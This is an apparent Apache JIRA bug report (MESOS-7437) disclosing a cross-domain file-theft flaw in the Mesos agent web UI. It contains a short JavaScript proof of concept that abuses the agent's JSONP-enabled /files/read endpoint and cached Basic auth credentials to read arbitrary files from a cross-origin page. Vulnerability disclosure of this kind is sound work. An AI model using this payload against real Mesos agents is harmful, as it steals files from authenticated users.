Jacob Janco created MESOS-7437:
----------------------------------

             Summary: cross domain file-theft in the web-ui
                 Key: MESOS-7437
                 URL: https://issues.apache.org/jira/browse/MESOS-7437
             Project: Mesos
          Issue Type: Bug
            Reporter: Jacob Janco
            Assignee: Jacob Janco
            Priority: Minor


// Proof of concept: load the authenticated agent endpoint as a cross-origin <script>.
x=document.createElement('script')
// jsonp=console.log makes the agent wrap the file contents in a console.log(...) call.
x.src='http://$AGENT_URI/files/read?path=$PATH_TO_FILE&offset=0&length=50000&jsonp=console.log&_=1490306716903'
// The browser attaches the cached Basic auth credentials and executes the response.
document.body.appendChild(x)

The above code pasted into the web console on http://example.com/, for example, 
will yield the contents of the requested file. Basic auth is cached and resent 
in browser tabs/windows as long as the user has authenticated during the 
browser session. 



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)